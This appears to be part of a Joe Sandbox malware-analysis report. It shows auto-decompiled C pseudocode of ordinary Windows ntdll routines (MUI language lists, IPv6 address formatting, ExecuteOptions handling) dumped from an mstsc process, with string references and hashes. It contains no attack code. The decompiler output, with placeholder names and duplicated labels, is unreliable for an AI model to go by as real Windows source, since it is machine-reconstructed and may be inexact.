                                              						if(_v32 == _t318) {
                                              							_v52 = _t318;
                                              							L58:
                                              							_t329 = 0xc0000017;
                                              							goto L47;
                                              						} else {
                                              							E025C2340(_v32, _v8, _v24);
                                              							_v16 = _v32;
                                              							_a4 = _t318;
                                              							_t235 = E025DE679(_v32, _t332);
                                              							while(1) {
                                              								_t319 = _t235;
                                              								if(_t319 == 0) {
                                              									break;
                                              								}
                                              								 *_t319 = 0;
                                              								_t321 = _t319 + 2;
                                              								E025CE2A8(_t322,  &_v68, _v16);
                                              								if(E025E5553(_t328,  &_v68,  &_v36) != 0) {
                                              									_a4 = _a4 + 1;
                                              								}
                                              								_v16 = _t321;
                                              								_t235 = E025DE679(_t321, _t332);
                                              								_pop(_t322);
                                              							}
                                              							_t236 = _v16;
                                              							if( *_v16 != _t319) {
                                              								E025CE2A8(_t322,  &_v68, _t236);
                                              								if(E025E5553(_t328,  &_v68,  &_v36) != 0) {
                                              									_a4 = _a4 + 1;
                                              								}
                                              							}
                                              							if(_a4 == 0) {
                                              								E025CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                              								_v52 = _v52 & 0x00000000;
                                              								_v32 = _v32 & 0x00000000;
                                              							}
                                              							if(_v8 != 0) {
                                              								E025CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                              							}
                                              							_v8 = _v8 & 0x00000000;
                                              							_t318 = 0;
                                              							goto L46;
                                              						}
                                              					}
                                              					_t257 = _v24;
                                              					_t322 = _t257 + 4;
                                              					_push(_t257);
                                              					_v40 = _t322;
                                              					E025E718A(_t257);
                                              					_t338 = _t335 + 4;
                                              					if(_t322 == _t318) {
                                              						_v20 = _t318;
                                              					} else {
                                              						_v20 = E025CE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                              					}
                                              					if(_v20 == _t318) {
                                              						_v40 = _t318;
                                              						goto L58;
                                              					} else {
                                              						E025C2340(_v20, _v8, _v24);
                                              						_v16 = _v20;
                                              						_a4 = _t318;
                                              						_t261 = E025DE679(_v20, _t332);
                                              						_t335 = _t338 + 0x14;
                                              						while(1) {
                                              							_v12 = _t261;
                                              							if(_t261 == _t318) {
                                              								break;
                                              							}
                                              							_v12 = _v12 + 2;
                                              							 *_v12 = 0;
                                              							E025CE2A8(_v12,  &_v68, _v16);
                                              							if(E025E5553(_t328,  &_v68,  &_v36) != 0) {
                                              								_a4 = _a4 + 1;
                                              							}
                                              							_v16 = _v12;
                                              							_t261 = E025DE679(_v12, _t332);
                                              							_pop(_t322);
                                              						}
                                              						_t269 = _v16;
                                              						if( *_v16 != _t318) {
                                              							E025CE2A8(_t322,  &_v68, _t269);
                                              							if(E025E5553(_t328,  &_v68,  &_v36) != 0) {
                                              								_a4 = _a4 + 1;
                                              							}
                                              						}
                                              						if(_a4 == _t318) {
                                              							E025CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                              							_v40 = _t318;
                                              							_v20 = _t318;
                                              						}
                                              						if(_v8 != _t318) {
                                              							E025CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                              						}
                                              						_v8 = _t318;
                                              						goto L30;
                                              					}
                                              				}
                                              				_t284 = _v24;
                                              				_t322 = _t284 + 4;
                                              				_push(_t284);
                                              				_v48 = _t322;
                                              				E025E718A(_t284);
                                              				_t339 = _t335 + 4;
                                              				if(_t322 == _t318) {
                                              					_v28 = _t318;
                                              				} else {
                                              					_v28 = E025CE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                              				}
                                              				if(_v28 == _t318) {
                                              					_v48 = _t318;
                                              					goto L58;
                                              				} else {
                                              					E025C2340(_v28, _v8, _v24);
                                              					_v16 = _v28;
                                              					_a4 = _t318;
                                              					_t288 = E025DE679(_v28, _t332);
                                              					_t335 = _t339 + 0x14;
                                              					while(1) {
                                              						_v12 = _t288;
                                              						if(_t288 == _t318) {
                                              							break;
                                              						}
                                              						_v12 = _v12 + 2;
                                              						 *_v12 = 0;
                                              						E025CE2A8(_v12,  &_v68, _v16);
                                              						if(E025E5553(_t328,  &_v68,  &_v36) != 0) {
                                              							_a4 = _a4 + 1;
                                              						}
                                              						_v16 = _v12;
                                              						_t288 = E025DE679(_v12, _t332);
                                              						_pop(_t322);
                                              					}
                                              					_t296 = _v16;
                                              					if( *_v16 != _t318) {
                                              						E025CE2A8(_t322,  &_v68, _t296);
                                              						if(E025E5553(_t328,  &_v68,  &_v36) != 0) {
                                              							_a4 = _a4 + 1;
                                              						}
                                              					}
                                              					if(_a4 == _t318) {
                                              						E025CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                              						_v48 = _t318;
                                              						_v28 = _t318;
                                              					}
                                              					if(_v8 != _t318) {
                                              						E025CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                              					}
                                              					_v8 = _t318;
                                              					goto L17;
                                              				}
                                              			}





































                                              0x025e8788
                                              0x025e8788
                                              0x025e8791
                                              0x025e8794
                                              0x025e8798
                                              0x025e879b
                                              0x025e879e
                                              0x025e87a1
                                              0x025e87a4
                                              0x025e87a7
                                              0x025e87aa
                                              0x025e87af
                                              0x02631ad3
                                              0x025e8b0a
                                              0x025e8b0d
                                              0x025e8b13
                                              0x025e8b19
                                              0x025e8b1f
                                              0x025e8b25
                                              0x025e8b2b
                                              0x025e8b31
                                              0x025e8b37
                                              0x025e8b3d
                                              0x025e8b46
                                              0x025e8b46
                                              0x025e87c6
                                              0x025e87d0
                                              0x02631ae0
                                              0x02631ae6
                                              0x02631af8
                                              0x02631af8
                                              0x02631afd
                                              0x02631afe
                                              0x02631b01
                                              0x02631b06
                                              0x02631b06
                                              0x025e87d6
                                              0x025e87f2
                                              0x025e87f7
                                              0x025e8807
                                              0x025e880a
                                              0x025e880f
                                              0x025e8810
                                              0x025e8813
                                              0x025e8818
                                              0x025e8818
                                              0x025e882c
                                              0x025e8831
                                              0x025e8838
                                              0x025e8908
                                              0x025e8920
                                              0x025e89f0
                                              0x025e8a08
                                              0x025e8af6
                                              0x025e8af6
                                              0x025e8af8
                                              0x025e8afb
                                              0x02631beb
                                              0x02631beb
                                              0x025e8b04
                                              0x02631bf8
                                              0x02631c0e
                                              0x02631c13
                                              0x02631c16
                                              0x02631c16
                                              0x02631bf8
                                              0x00000000
                                              0x025e8b04
                                              0x025e8a0e
                                              0x025e8a11
                                              0x025e8a14
                                              0x025e8a15
                                              0x025e8a18
                                              0x025e8a22
                                              0x025e8b59
                                              0x025e8a28
                                              0x025e8a3c
                                              0x025e8a3c
                                              0x025e8a42
                                              0x02631bb0
                                              0x02631b11
                                              0x02631b11
                                              0x00000000
                                              0x025e8a48
                                              0x025e8a51
                                              0x025e8a5b
                                              0x025e8a5e
                                              0x025e8a61
                                              0x025e8a69
                                              0x025e8a69
                                              0x025e8a6d
                                              0x00000000
                                              0x00000000
                                              0x025e8a74
                                              0x025e8a7c
                                              0x025e8a7d
                                              0x025e8a91
                                              0x025e8a93
                                              0x025e8a93
                                              0x025e8a98
                                              0x025e8a9b
                                              0x025e8aa1
                                              0x025e8aa1
                                              0x025e8aa4
                                              0x025e8aaa
                                              0x025e8ab1
                                              0x025e8ac5
                                              0x025e8ac7
                                              0x025e8ac7
                                              0x025e8ac5
                                              0x025e8ace
                                              0x02631bc9
                                              0x02631bce
                                              0x02631bd2
                                              0x02631bd2
                                              0x025e8ad8
                                              0x025e8aeb
                                              0x025e8aeb
                                              0x025e8af0
                                              0x025e8af4
                                              0x00000000
                                              0x025e8af4
                                              0x025e8a42
                                              0x025e8926
                                              0x025e8929
                                              0x025e892c
                                              0x025e892d
                                              0x025e8930
                                              0x025e8935
                                              0x025e893a
                                              0x025e8b51
                                              0x025e8940
                                              0x025e8954
                                              0x025e8954
                                              0x025e895a
                                              0x02631b63
                                              0x00000000
                                              0x025e8960
                                              0x025e8969
                                              0x025e8973
                                              0x025e8976
                                              0x025e8979
                                              0x025e897e
                                              0x025e8981
                                              0x025e8981
                                              0x025e8986
                                              0x00000000
                                              0x00000000
                                              0x02631b6e
                                              0x02631b74
                                              0x02631b7b
                                              0x02631b8f
                                              0x02631b91
                                              0x02631b91
                                              0x02631b99
                                              0x02631b9c
                                              0x02631ba2
                                              0x02631ba2
                                              0x025e898c
                                              0x025e8992
                                              0x025e8999
                                              0x025e89ad
                                              0x02631ba8
                                              0x02631ba8
                                              0x025e89ad
                                              0x025e89b6
                                              0x025e89c8
                                              0x025e89cd
                                              0x025e89d0
                                              0x025e89d0
                                              0x025e89d6
                                              0x025e89e8
                                              0x025e89e8
                                              0x025e89ed
                                              0x00000000
                                              0x025e89ed
                                              0x025e895a
                                              0x025e883e
                                              0x025e8841
                                              0x025e8844
                                              0x025e8845
                                              0x025e8848
                                              0x025e884d
                                              0x025e8852
                                              0x025e8b49
                                              0x025e8858
                                              0x025e886c
                                              0x025e886c
                                              0x025e8872
                                              0x02631b0e
                                              0x00000000
                                              0x025e8878
                                              0x025e8881
                                              0x025e888b
                                              0x025e888e
                                              0x025e8891
                                              0x025e8896
                                              0x025e8899
                                              0x025e8899
                                              0x025e889e
                                              0x00000000
                                              0x00000000
                                              0x02631b21
                                              0x02631b27
                                              0x02631b2e
                                              0x02631b42
                                              0x02631b44
                                              0x02631b44
                                              0x02631b4c
                                              0x02631b4f
                                              0x02631b55
                                              0x02631b55
                                              0x025e88a4
                                              0x025e88aa
                                              0x025e88b1
                                              0x025e88c5
                                              0x02631b5b
                                              0x02631b5b
                                              0x025e88c5
                                              0x025e88ce
                                              0x025e88e0
                                              0x025e88e5
                                              0x025e88e8
                                              0x025e88e8
                                              0x025e88ee
                                              0x025e8900
                                              0x025e8900
                                              0x025e8905
                                              0x00000000
                                              0x025e8905

                                              APIs
                                              Strings
                                              • WindowsExcludedProcs, xrefs: 025E87C1
                                              • Kernel-MUI-Language-SKU, xrefs: 025E89FC
                                              • Kernel-MUI-Number-Allowed, xrefs: 025E87E6
                                              • Kernel-MUI-Language-Disallowed, xrefs: 025E8914
                                              • Kernel-MUI-Language-Allowed, xrefs: 025E8827
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: _wcspbrk
                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                              • API String ID: 402402107-258546922
                                              • Opcode ID: 21780019972813ad2d69e163f1dc0abd4ae8975f671ce059ca4f0cf44427fa7b
                                              • Instruction ID: 0806cf663957517554e4b4abe69ab7818d25ebcdd015eaa6d128ae5883901ffe
                                              • Opcode Fuzzy Hash: 21780019972813ad2d69e163f1dc0abd4ae8975f671ce059ca4f0cf44427fa7b
                                              • Instruction Fuzzy Hash: 77F1D5B1D00209EFCF15DF98C985AEEBBB9FF48314F1444AAE506A7220E7349A45DF64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 38%
                                              			E026013CB(intOrPtr* _a4, intOrPtr _a8) {
                                              				char _v8;
                                              				intOrPtr _v12;
                                              				intOrPtr* _v16;
                                              				intOrPtr _v20;
                                              				char _v24;
                                              				intOrPtr _t71;
                                              				signed int _t78;
                                              				signed int _t86;
                                              				char _t90;
                                              				signed int _t91;
                                              				signed int _t96;
                                              				intOrPtr _t108;
                                              				signed int _t114;
                                              				void* _t115;
                                              				intOrPtr _t128;
                                              				intOrPtr* _t129;
                                              				void* _t130;
                                              
                                              				_t129 = _a4;
                                              				_t128 = _a8;
                                              				_t116 = 0;
                                              				_t71 = _t128 + 0x5c;
                                              				_v8 = 8;
                                              				_v20 = _t71;
                                              				if( *_t129 == 0) {
                                              					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                              						goto L5;
                                              					} else {
                                              						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                              						if(_t96 != 0) {
                                              							L38:
                                              							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                              								goto L5;
                                              							} else {
                                              								_push( *(_t129 + 0xf) & 0x000000ff);
                                              								_push( *(_t129 + 0xe) & 0x000000ff);
                                              								_push( *(_t129 + 0xd) & 0x000000ff);
                                              								_t86 = E025F7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                              								L36:
                                              								return _t128 + _t86 * 2;
                                              							}
                                              						}
                                              						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                              						if(_t114 == 0) {
                                              							L33:
                                              							_t115 = 0x25c2926;
                                              							L35:
                                              							_push( *(_t129 + 0xf) & 0x000000ff);
                                              							_push( *(_t129 + 0xe) & 0x000000ff);
                                              							_push( *(_t129 + 0xd) & 0x000000ff);
                                              							_push( *(_t129 + 0xc) & 0x000000ff);
                                              							_t86 = E025F7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                              							goto L36;
                                              						}
                                              						if(_t114 != 0xffff) {
                                              							_t116 = 0;
                                              							goto L38;
                                              						}
                                              						if(_t114 != 0) {
                                              							_t115 = 0x25c9cac;
                                              							goto L35;
                                              						}
                                              						goto L33;
                                              					}
                                              				} else {
                                              					L5:
                                              					_a8 = _t116;
                                              					_a4 = _t116;
                                              					_v12 = _t116;
                                              					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                              						if( *(_t129 + 0xa) == 0xfe5e) {
                                              							_v8 = 6;
                                              						}
                                              					}
                                              					_t90 = _v8;
                                              					if(_t90 <= _t116) {
                                              						L11:
                                              						if(_a8 - _a4 <= 1) {
                                              							_a8 = _t116;
                                              							_a4 = _t116;
                                              						}
                                              						_t91 = 0;
                                              						if(_v8 <= _t116) {
                                              							L22:
                                              							if(_v8 < 8) {
                                              								_push( *(_t129 + 0xf) & 0x000000ff);
                                              								_push( *(_t129 + 0xe) & 0x000000ff);
                                              								_push( *(_t129 + 0xd) & 0x000000ff);
                                              								_t128 = _t128 + E025F7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                              							}
                                              							return _t128;
                                              						} else {
                                              							L14:
                                              							L14:
                                              							if(_a4 > _t91 || _t91 >= _a8) {
                                              								if(_t91 != _t116 && _t91 != _a8) {
                                              									_push(":");
                                              									_push(_t71 - _t128 >> 1);
                                              									_push(_t128);
                                              									_t128 = _t128 + E025F7707() * 2;
                                              									_t71 = _v20;
                                              									_t130 = _t130 + 0xc;
                                              								}
                                              								_t78 = E025F7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                              								_t130 = _t130 + 0x10;
                                              							} else {
                                              								_push(L"::");
                                              								_push(_t71 - _t128 >> 1);
                                              								_push(_t128);
                                              								_t78 = E025F7707();
                                              								_t130 = _t130 + 0xc;
                                              								_t91 = _a8 - 1;
                                              							}
                                              							_t91 = _t91 + 1;
                                              							_t128 = _t128 + _t78 * 2;
                                              							_t71 = _v20;
                                              							if(_t91 >= _v8) {
                                              								goto L22;
                                              							}
                                              							_t116 = 0;
                                              							goto L14;
                                              						}
                                              					} else {
                                              						_t108 = 1;
                                              						_v16 = _t129;
                                              						_v24 = _t90;
                                              						do {
                                              							if( *_v16 == _t116) {
                                              								if(_t108 - _v12 > _a8 - _a4) {
                                              									_a4 = _v12;
                                              									_a8 = _t108;
                                              								}
                                              								_t116 = 0;
                                              							} else {
                                              								_v12 = _t108;
                                              							}
                                              							_v16 = _v16 + 2;
                                              							_t108 = _t108 + 1;
                                              							_t26 =  &_v24;
                                              							 *_t26 = _v24 - 1;
                                              						} while ( *_t26 != 0);
                                              						goto L11;
                                              					}
                                              				}
                                              			}




















                                              0x026013d5
                                              0x026013d9
                                              0x026013dc
                                              0x026013de
                                              0x026013e1
                                              0x026013e8
                                              0x026013ee
                                              0x0262e8fd
                                              0x00000000
                                              0x0262e921
                                              0x0262e921
                                              0x0262e928
                                              0x0262e982
                                              0x0262e98a
                                              0x00000000
                                              0x0262e99a
                                              0x0262e99e
                                              0x0262e9a3
                                              0x0262e9a8
                                              0x0262e9b9
                                              0x0262e978
                                              0x00000000
                                              0x0262e978
                                              0x0262e98a
                                              0x0262e92a
                                              0x0262e931
                                              0x0262e944
                                              0x0262e944
                                              0x0262e950
                                              0x0262e954
                                              0x0262e959
                                              0x0262e95e
                                              0x0262e963
                                              0x0262e970
                                              0x00000000
                                              0x0262e975
                                              0x0262e93b
                                              0x0262e980
                                              0x00000000
                                              0x0262e980
                                              0x0262e942
                                              0x0262e94b
                                              0x00000000
                                              0x0262e94b
                                              0x00000000
                                              0x0262e942
                                              0x026013f4
                                              0x026013f4
                                              0x026013f9
                                              0x026013fc
                                              0x026013ff
                                              0x02601406
                                              0x0262e9cc
                                              0x0262e9d2
                                              0x0262e9d2
                                              0x0262e9cc
                                              0x0260140c
                                              0x02601411
                                              0x02601431
                                              0x0260143a
                                              0x0260143c
                                              0x0260143f
                                              0x0260143f
                                              0x02601442
                                              0x02601447
                                              0x026014a8
                                              0x026014ac
                                              0x0262e9e2
                                              0x0262e9e7
                                              0x0262e9ec
                                              0x0262ea05
                                              0x0262ea05
                                              0x00000000
                                              0x02601449
                                              0x00000000
                                              0x02601449
                                              0x0260144c
                                              0x02601459
                                              0x02601462
                                              0x02601469
                                              0x0260146a
                                              0x02601470
                                              0x02601473
                                              0x02601476
                                              0x02601476
                                              0x02601490
                                              0x02601495
                                              0x0260138e
                                              0x02601390
                                              0x02601397
                                              0x02601398
                                              0x02601399
                                              0x026013a1
                                              0x026013a4
                                              0x026013a4
                                              0x02601498
                                              0x0260149c
                                              0x0260149f
                                              0x026014a2
                                              0x00000000
                                              0x00000000
                                              0x026014a4
                                              0x00000000
                                              0x026014a4
                                              0x02601413
                                              0x02601415
                                              0x02601416
                                              0x02601419
                                              0x0260141c
                                              0x02601422
                                              0x026013b7
                                              0x026013bc
                                              0x026013bf
                                              0x026013bf
                                              0x026013c2
                                              0x02601424
                                              0x02601424
                                              0x02601424
                                              0x02601427
                                              0x0260142b
                                              0x0260142c
                                              0x0260142c
                                              0x0260142c
                                              0x00000000
                                              0x0260141c
                                              0x02601411

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              • Opcode ID: 47905478c36c1a5eb12fa2443227a98dcd752cd7a7e0d80b92e0aa525679dae4
                                              • Instruction ID: 067bf57b2c35e4757d77f2f9da0386989a19b80efb26004aef0e9ae8a6f600b2
                                              • Opcode Fuzzy Hash: 47905478c36c1a5eb12fa2443227a98dcd752cd7a7e0d80b92e0aa525679dae4
                                              • Instruction Fuzzy Hash: BE6126B1D00655AADF2CCF99C8C09BFBBB5FF85300B54C1AEE59A57680D335A640DB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 64%
                                              			E025F7EFD(void* __ecx, intOrPtr _a4) {
                                              				signed int _v8;
                                              				char _v540;
                                              				unsigned int _v544;
                                              				signed int _v548;
                                              				intOrPtr _v552;
                                              				char _v556;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				signed int _t33;
                                              				void* _t38;
                                              				unsigned int _t46;
                                              				unsigned int _t47;
                                              				unsigned int _t52;
                                              				intOrPtr _t56;
                                              				unsigned int _t62;
                                              				void* _t69;
                                              				void* _t70;
                                              				intOrPtr _t72;
                                              				signed int _t73;
                                              				void* _t74;
                                              				void* _t75;
                                              				void* _t76;
                                              				void* _t77;
                                              
                                              				_t33 =  *0x26a2088; // 0x7614a8e1
                                              				_v8 = _t33 ^ _t73;
                                              				_v548 = _v548 & 0x00000000;
                                              				_t72 = _a4;
                                              				if(E025F7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                              					__eflags = _v548;
                                              					if(_v548 == 0) {
                                              						goto L1;
                                              					}
                                              					_t62 = _t72 + 0x24;
                                              					E02613F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                              					_t71 = 0x214;
                                              					_v544 = 0x214;
                                              					E025CDFC0( &_v540, 0, 0x214);
                                              					_t75 = _t74 + 0x20;
                                              					_t46 =  *0x26a4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                              					__eflags = _t46;
                                              					if(_t46 == 0) {
                                              						goto L1;
                                              					}
                                              					_t47 = _v544;
                                              					__eflags = _t47;
                                              					if(_t47 == 0) {
                                              						goto L1;
                                              					}
                                              					__eflags = _t47 - 0x214;
                                              					if(_t47 >= 0x214) {
                                              						goto L1;
                                              					}
                                              					_push(_t62);
                                              					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                              					E02613F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                              					_t52 = E025D0D27( &_v540, L"Execute=1");
                                              					_t76 = _t75 + 0x1c;
                                              					_push(_t62);
                                              					__eflags = _t52;
                                              					if(_t52 == 0) {
                                              						E02613F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                              						_t71 =  &_v540;
                                              						_t56 = _t73 + _v544 - 0x218;
                                              						_t77 = _t76 + 0x14;
                                              						_v552 = _t56;
                                              						__eflags = _t71 - _t56;
                                              						if(_t71 >= _t56) {
                                              							goto L1;
                                              						} else {
                                              							goto L10;
                                              						}
                                              						while(1) {
                                              							L10:
                                              							_t62 = E025D8375(_t71, 0x20);
                                              							_pop(_t69);
                                              							__eflags = _t62;
                                              							if(__eflags != 0) {
                                              								__eflags = 0;
                                              								 *_t62 = 0;
                                              							}
                                              							E02613F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                              							_t77 = _t77 + 0x10;
                                              							E0263E8DB(_t69, _t70, __eflags, _t72, _t71);
                                              							__eflags = _t62;
                                              							if(_t62 == 0) {
                                              								goto L1;
                                              							}
                                              							_t31 = _t62 + 2; // 0x2
                                              							_t71 = _t31;
                                              							__eflags = _t71 - _v552;
                                              							if(_t71 >= _v552) {
                                              								goto L1;
                                              							}
                                              						}
                                              					}
                                              					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                              					_push(3);
                                              					_push(0x55);
                                              					E02613F92();
                                              					_t38 = 1;
                                              					L2:
                                              					return E025CE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                              				}
                                              				L1:
                                              				_t38 = 0;
                                              				goto L2;
                                              			}



























                                              0x025f7f08
                                              0x025f7f0f
                                              0x025f7f12
                                              0x025f7f1b
                                              0x025f7f31
                                              0x02613ead
                                              0x02613eb4
                                              0x00000000
                                              0x00000000
                                              0x02613eba
                                              0x02613ecd
                                              0x02613ed2
                                              0x02613ee1
                                              0x02613ee7
                                              0x02613eec
                                              0x02613f12
                                              0x02613f18
                                              0x02613f1a
                                              0x00000000
                                              0x00000000
                                              0x02613f20
                                              0x02613f26
                                              0x02613f28
                                              0x00000000
                                              0x00000000
                                              0x02613f2e
                                              0x02613f30
                                              0x00000000
                                              0x00000000
                                              0x02613f3a
                                              0x02613f3b
                                              0x02613f53
                                              0x02613f64
                                              0x02613f69
                                              0x02613f6c
                                              0x02613f6d
                                              0x02613f6f
                                              0x0261e304
                                              0x0261e30f
                                              0x0261e315
                                              0x0261e31e
                                              0x0261e321
                                              0x0261e327
                                              0x0261e329
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0261e32f
                                              0x0261e32f
                                              0x0261e337
                                              0x0261e33a
                                              0x0261e33b
                                              0x0261e33d
                                              0x0261e33f
                                              0x0261e341
                                              0x0261e341
                                              0x0261e34e
                                              0x0261e353
                                              0x0261e358
                                              0x0261e35d
                                              0x0261e35f
                                              0x00000000
                                              0x00000000
                                              0x0261e365
                                              0x0261e365
                                              0x0261e368
                                              0x0261e36e
                                              0x00000000
                                              0x00000000
                                              0x0261e374
                                              0x0261e32f
                                              0x02613f75
                                              0x02613f7a
                                              0x02613f7c
                                              0x02613f7e
                                              0x02613f86
                                              0x025f7f39
                                              0x025f7f47
                                              0x025f7f47
                                              0x025f7f37
                                              0x025f7f37
                                              0x00000000

                                              APIs
                                              • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02613F12
                                              Strings
                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0261E2FB
                                              • Execute=1, xrefs: 02613F5E
                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02613F4A
                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02613F75
                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02613EC4
                                              • ExecuteOptions, xrefs: 02613F04
                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 0261E345
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: BaseDataModuleQuery
                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                              • API String ID: 3901378454-484625025
                                              • Opcode ID: 846acd3cfeab939094bfd75ad13f9c418bd4176fc03638633da79419e6f3ba12
                                              • Instruction ID: 9c5d771aa6709d4a683a0ac585eeb3c3125a81b8d05991eeaa5dba0f84c07b86
                                              • Opcode Fuzzy Hash: 846acd3cfeab939094bfd75ad13f9c418bd4176fc03638633da79419e6f3ba12
